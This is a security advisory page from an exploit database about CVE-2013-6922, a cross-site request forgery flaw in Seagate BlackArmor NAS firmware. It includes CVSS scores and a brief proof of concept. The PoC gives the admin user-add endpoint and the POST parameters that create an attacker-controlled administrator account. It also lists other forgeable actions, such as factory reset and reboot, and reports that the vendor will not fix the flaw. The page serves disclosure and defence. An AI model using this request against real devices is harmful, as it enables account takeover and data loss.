Seagate BlackArmor NAS Cross Site Request Forgery

2014.01.06
Credit: Jeroen - IT Nerdbox
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2013-6922
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery # Google Dork: N/A # Date: 04-01-2014 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.seagate.com/ # Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ # Version: sg2000-2000.1331 # Tested on: N/A # CVE : CVE-2013-6922 # ## Description: # # There are multiple CSRF attacks possible, the proof of concept shows how it is possible to add # a user with administrative privileges to the system. # # It is also possible to: # # 1. Factory reset the device # 2. Reboot the device # 3. Add/Edit/Remove users # 4. Add/Edit/Remove shares and volumes # # This vulnerability was reported to Seagate in September 2013, they stated that this will not be fixed. # ## Proof of Concept: # # POST: http(s)://<url | ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 # Parameters: # # username attacker # adminright yes # fullname hacker # userpasswd attackers_password # userpasswdcheck attackers_password

References:

http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top